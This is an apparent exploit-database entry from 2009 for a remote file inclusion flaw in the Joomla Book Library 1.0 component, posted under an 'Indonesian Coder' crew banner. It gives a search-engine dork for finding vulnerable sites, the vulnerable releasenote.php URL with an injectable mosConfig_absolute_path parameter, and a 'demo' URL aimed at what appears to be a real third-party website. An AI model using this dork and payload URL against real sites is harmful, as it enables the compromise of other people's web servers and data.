Joomla Book Library 1.0 file inclusion

2009-10-19T00:00:00
ID 1337DAY-ID-9929
Type zdt
Reporter kaMtiEz
Modified 2009-10-19T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ======================================
Joomla Book Library 1.0 file inclusion
======================================

#############################################################################################################
## Joomla Component com_booklibrary Remote File Include vulnerability                                      ##
## Author : kaMtiEz                     																   ##
## Homepage : http://www.indonesiancoder.com                                                               ##
## Date : September 27, 2009                                                                               ##
#############################################################################################################
# Hello My Name Is :                                                                                       ##
#  __               _____   __  ._____________                                                             ##
# |  | _______     /     \_/  |_|__\_   _____/_______                                                      ##
# |  |/ /\__  \   /  \ /  \   __\  ||    __)_\___   /                                                      ##
# |    <  / __ \_/    Y    \  | |  ||        \/    /                                                       ##
# |__|_ \(____  /\____|__  /__| |__/_______  /_____ \                                                      ##
#      \/     \/         \/                \/      \/ -=- INDONESIAN CODER -=- KILL-9 CREW -=-             ##
#############################################################################################################
 
[ Software Information ]
 
[+] Vendor : http://www.joomlawebserver.com/
[+] Download : http://www.joomlawebserver.com/extensions/index.php
[+] version : 1.0
[+] Vulnerability : RFI
[+] price : FREE
[+] Dork : inurl:"com_booklibrary"
[+] Location : INDONESIA
#############################################################################################################
 
[ Vulnerable File ]
 
http://127.0.0.1/administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=[INDONESIANCODER-Ev1L]
 
[ BUG IN ]
 
releasenote.php
 
got error ;)
 
require('./components/com_booklibrary/admin.booklibrary.class.conf.php');
 
[ DEMO ]
 
http://www.fila-brasileiro.pl/administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=[kaMtiEz RoX]
 

#  0day.today [2018-01-10]  #